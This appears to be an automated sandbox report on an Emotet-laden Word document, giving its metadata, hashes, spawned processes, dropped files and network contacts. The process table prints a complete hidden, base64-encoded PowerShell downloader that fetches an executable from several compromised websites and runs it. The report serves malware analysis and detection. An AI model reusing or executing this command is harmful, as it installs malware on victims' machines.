File name: | Status update.doc |
Full analysis: | https://app.any.run/tasks/758adb56-c4c8-46c5-8b87-fac0a7142411 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 16, 2019, 07:21:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Atque recusandae veniam., Author: Nancy Harnapp, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 15 15:48:00 2019, Last Saved Time/Date: Fri Nov 15 15:48:00 2019, Number of Pages: 1, Number of Words: 19, Number of Characters: 113, Security: 0 |
MD5: | 948DF8949EFDD128DB80F25BC8BC7DAA |
SHA1: | A5F7497DE253933FA289C4EA24C1772154406969 |
SHA256: | B682885D7855225EFDA7BF749AA91C0DB38E272824E63C273D4C75B6E9D43839 |
SSDEEP: | 3072:ug/3LH+UaqFh5Zr/SzFaSadGBrjC48+WZ/POhh+/YUEmSMQ62QW:ug/3LHNaqzSzGdD48+aPOnDUEto2j |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Atque recusandae veniam. |
---|---|
Subject: | - |
Author: | Nancy Harnapp |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:11:15 15:48:00 |
ModifyDate: | 2019:11:15 15:48:00 |
Pages: | 1 |
Words: | 19 |
Characters: | 113 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 131 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2524 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Status update.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4084 | powershell -w hidden -enco JABPAGoAcABjAGsAdwB4AGgAYQBvAGoAZABlAD0AJwBLAHQAdwBmAGIAcwBsAG8AJwA7ACQAUQBnAG0AegBsAHIAagBjAGUAcgAgAD0AIAAnADkANgAzACcAOwAkAEkAeABzAHQAZwB4AGkAZgA9ACcARQB2AHMAYwBlAGUAagBiAHcAaQB2AGEAbwAnADsAJABQAHIAZABwAGkAdQB4AGMAeQBjAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABRAGcAbQB6AGwAcgBqAGMAZQByACsAJwAuAGUAeABlACcAOwAkAEkAbABoAGYAZAB1AHEAZABqAD0AJwBPAGgAaQBsAHUAeQBrAGUAJwA7ACQAVQBkAHYAbgBiAGsAbwB1AG8AbABwAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAGMAbABpAGUAbgBUADsAJABWAGEAeQB2AGgAYQBsAGUAcgB5AD0AJwBoAHQAdABwADoALwAvAHIAbwBkAHAAcgBvAHAAZQByAHQAaQBlAHMALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0ANAA3ADAAbgBuAGQALQA4ADEAMgBlAGwAegBiAGoAMgAtADMAOQA5ADMANQA0ADIANQAxAC8AKgBoAHQAdABwADoALwAvAHMAaABvAHAALgBzAGEAbAB0AGQAbwBnAHMALgBjAG8AbQAvAGYAZgAwAGwAYgAvAGMAYQBjAGgAZQAvAGgAegB2AHYALQBlAHMAcgAtADAAMQAyADYANQAvACoAaAB0AHQAcABzADoALwAvAHMAcABlAGwAbABpAG4AZwB3AG8AcgBkAHMAZgBvAHIAYwBoAGkAbABkAHIAZQBuAC4AYwBvAG0ALwB6AHQAbABqAC8AeQB6AGUAcgBGAGgALwAqAGgAdAB0AHAAcwA6AC8ALwBnAHIAZQBlAG4AZQByAGMAbABlAGEAbgB0AGUAYQBtAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBwAG4AYQA1AHUAdgBpADgAbQAtAHgAYwAyAHIAeAA0AC0AMgA5ADEANgAvACoAaAB0AHQAcAA6AC8ALwByAG8AeQBhAGwAdAB5AHIAZQBpAGcAbgBpAG4AdgBlAHMAdABtAGUAbgB0AHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADYAcAByAHgAOQA1AGEAOQBpAC0AdgB0AHAANQBpAHAALQA0ADUANwA3AC8AJwAuACIAcwBQAEwAYABJAFQAIgAoACcAKgAnACkAOwAkAEQAZAB4AG4AYgBtAGMAcQBmAGgAagB0AGsAPQAnAEIAYQB4AGUAbgByAGkAbwBlAHEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEQAdgBmAGYAbABhAHQAbwBjACAAaQBuACAAJABWAGEAeQB2AGgAYQBsAGUAcgB5ACkAewB0AHIAeQB7ACQAVQBkAHYAbgBiAGsAbwB1AG8AbABwAC4AIgBEAGAATwB3AE4AbABPAEEAYABEAEYAaQBgAGwARQAiACgAJABEAHYAZgBmAGwAYQB0AG8AYwAsACAAJABQAHIAZABwAGkAdQB4AGMAeQBjACkAOwAkAEwAbgB4AHEAagB0AGsAZQBoAGoAcgBiAD0AJwBOAGQAZwByAHUAdwBsAHoAdAB4AG0AJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABQAHIAZABwAGkAdQB4AGMAeQBjACkALgAiAEwAYABFAG4AZwBUAEgAIgAgAC0AZwBlACAAMwA5ADgAMwA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAEEAUgBUACIAKAAkAFAAcgBkAHAAaQB1AHgAYwB5AGMAKQA7ACQAVQBwAHMAeAB5AHQAcgBjAGkAPQAnAEEAYQBzAGUAcgBpAHYAdwB6AGUAZgBpAG4AJwA7AGIAcgBlAGEAawA7ACQASQBsAHUAegBkAGoAYQBkAGoAPQAnAFUAYwBvAHcAbAB1AG8AcgB0AHcAcwB1ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAYwBzAGMAcABnAGYAYgBzAGwAZgA9ACcATgBwAHoAdwBpAGwAYQBuAHMAaQAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2524 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAA06.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4084 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D0VF2FQNCHUF9RHHZHEG.temp | — | |
MD5:— | SHA256:— | |||
2524 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0BF9FA2.wmf | wmf | |
MD5:3265170B363361F4E06AD6DAA7BC58FC | SHA256:F52BCE60F548B2EAC4F4B7B132D3A583C8C6D31A561201441500B2EBB4CA772A | |||
2524 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31C1660E.wmf | wmf | |
MD5:DEB21C2B8B5777A70004E4613E217E00 | SHA256:E9E93539BE98F93C79DD01646763805A95F49C3130DBF802DC5105BB5962C338 | |||
2524 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8CD9C2B7.wmf | wmf | |
MD5:8344D9A61FAFCDE4905987DDEBF2387F | SHA256:FC1174E1234C55F346162850C9B59F69D169149DA86D769564606AFFE4CEAAAE | |||
2524 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D3E45E9E34C71A48C10FD945E9620BAF | SHA256:6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F | |||
2524 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A27A73B.wmf | wmf | |
MD5:690FFD915D1A29D4B9D7D3D6F2D46EC8 | SHA256:9125B74A696B656134BEEB93DB2424C2B6A9295C5D04308992D9B00EEFBCA7B9 | |||
2524 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$atus update.doc | pgc | |
MD5:29CE4913B4F131D5CA32AECCE60C275E | SHA256:06299762B84C52DA352463CC5109A716430B5E46509FEE31A015CAF7353D53E1 | |||
2524 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6480001.wmf | wmf | |
MD5:E469C0048C81E90A7B16083C57F96BFB | SHA256:9BE4C5710D62F22FC690CFDA958B19987D703B5956C90C831D9C423BBB3AC044 | |||
2524 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45680000.wmf | wmf | |
MD5:950F73231C97F606FF703673124795E5 | SHA256:DD9B1E482FA6ECF0C83373DDFE5EB2725E19E2F4334CF22E95769C1BC67085E6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 104.31.93.63:80 | http://rodproperties.com/wp-includes/m470nnd-812elzbj2-399354251/ | US | html | 4.00 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 104.31.93.63:80 | rodproperties.com | Cloudflare Inc | US | unknown |
Domain | IP | Reputation |
---|---|---|
rodproperties.com |
| suspicious |